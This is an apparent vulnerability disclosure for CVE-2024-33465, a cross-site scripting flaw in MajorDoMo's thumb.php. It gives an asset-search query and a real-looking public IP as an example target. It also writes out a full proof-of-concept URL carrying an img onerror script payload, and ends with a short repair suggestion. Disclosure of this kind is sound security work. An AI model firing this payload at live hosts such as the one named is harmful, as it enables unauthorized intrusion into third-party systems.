CVE-2024-33465
BUG_Author:
hbzms
Vendor:
https://majordomo.smartliving.ru/
Vulnerability description
Cross Site Scripting vulnerability in MajorDoMo before v.0662e5e allows an attacker to escalate privileges via the the thumb/thumb.php component.
Sphere of influence
MajorDoMo < 0662e5e
Vulnerability recurrence
app=”MajordomoSL”
Find related assets as follows(Just use one as an example)
http://95.110.79.90:9090/
Visit the above url link
Then add the payload after the link
The payload is as follows
http://95.110.79.90:9090/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%3Cimg%20src=1%20onerror=alert(1)%3E
Repair suggestions
Turn off Internet exposure or interface settings access